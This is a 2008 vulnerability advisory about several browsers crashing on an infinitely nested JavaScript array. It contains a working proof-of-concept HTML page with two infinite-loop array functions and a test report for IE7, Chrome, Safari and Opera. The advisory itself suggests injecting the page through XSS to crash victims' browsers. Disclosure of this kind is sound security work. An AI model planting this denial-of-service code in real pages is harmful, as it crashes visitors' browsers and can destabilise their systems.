browser-overflows.txt

`##################################################  
Multiple Browsers Stack overflow in javascript with infinite array  
original article:http://lostmon.blogspot.com/  
2008/11/multiple-browsers-stack-overflow-in.html  
##################################################  
############  
Description  
############  
  
Multiple Browsers are prone vulnerables to a stack overflow  
or crash via infinite array in Javascript engine.  
This is a extended research from this vulnerability/exploit :  
http://www.securityfocus.com/bid/31703  
  
This issue can use for example in a web post vulnerable to xss  
Style attacks or similar to do a DoS from web to Web browsers victim´s.  
  
################  
Browsers Tested:  
################  
  
Fail = affected  
pass = Not affected ¿?  
  
#####################  
Testing  
#####################  
.:[-Multiple Browsers infnite array PoC By Lostmon -]:.  
Here You have two variants of this array sav this file:  
#####################################  
<html>  
<head>  
<title>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</title>  
<script type="text/javascript">  
function infinite_array()  
{  
foo = new Array();  
alert('infinite array');  
while(true) {foo = new Array(foo);}  
}  
function infinite_array2()  
{  
foo = new Array();  
alert('Infinite array with sort()');  
while(true) {foo = new Array(foo).sort();}  
}  
</script>  
</head>  
<body>  
<h3>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</h3>  
<input type="button" value="Infinite array Without sort()"  
onclick="infinite_array();" />  
<input type="button" value="Infinite array with sort()"  
onclick="infinite_array2();" />  
</body></html>  
####################################  
  
see table image :  
http://usuarios.lycos.es/reyfuss/xss/images/tabla.GIF  
  
###############  
Stack Overflow  
###############  
  
IE7 , Avant Browser and Maxthor browsers this cause a stack  
overflow in javascript.  
  
In ie7 i try to trace and exploit it with olly debugger ,  
but all cases what i test to turn it executable , are all  
time go to SEH. This is not exploitable , and the browsers  
wen click in the alert can continue working without problems;  
them this is a recoverable issue.Microsoft security team has  
determine that this issue at this moment is not exploitable.  
  
In Google Chrome can cause a tab Crash or if we only have  
open one window and one tab, open the exploit, and don´t wait,  
try to navigate to google or other site causes that google  
Chrome close without warning , error, or alert, if we have  
open multiple tabs, this issue only crash/close the tab  
affected by the exploit. If open the exploit and wait few  
seconds Chrome show a warning to close the crashed tab.  
  
  
################  
Memory abuse  
################  
  
In ie7 can cause a memory abuse and can turn unestable all  
system and all aplications.(it can load all memory)  
  
In safari for windows can cause a program termination, safari  
closes all windows, all tabs without a alert or a warning or  
error.With olly , can trace , and it´s too a stack overflow.  
  
In Google Chrome can cause a tab Crash or if we only have open  
one window and one tab, open the exploit, and don´t wait, try  
to navigate to google or other site causes that google Chrome  
close without warning , error, or alert if open the exploit  
and wait few seconds Chrome show a warning to close the  
crashed tab.  
  
Some other browsers detects the slow scripts and ask for stop.  
In opera , it abuse memory , but we can recover it or navigate  
to other sites them this is a recoverable issue.  
  
#######################€nd#####################  
  
Thnx to Microsoft security team for support & interesting.  
Thnx to Apple security team for support & interesting.  
--  
Thnx to estrella to be my ligth  
Thnx To FalconDeOro for his support  
Thnx To Imydes From http://www.imydes.com  
  
--  
atentamente:  
Lostmon ([email protected])  
  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
La curiosidad es lo que hace mover la mente....  
  
--   
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
La curiosidad es lo que hace mover la mente....  
`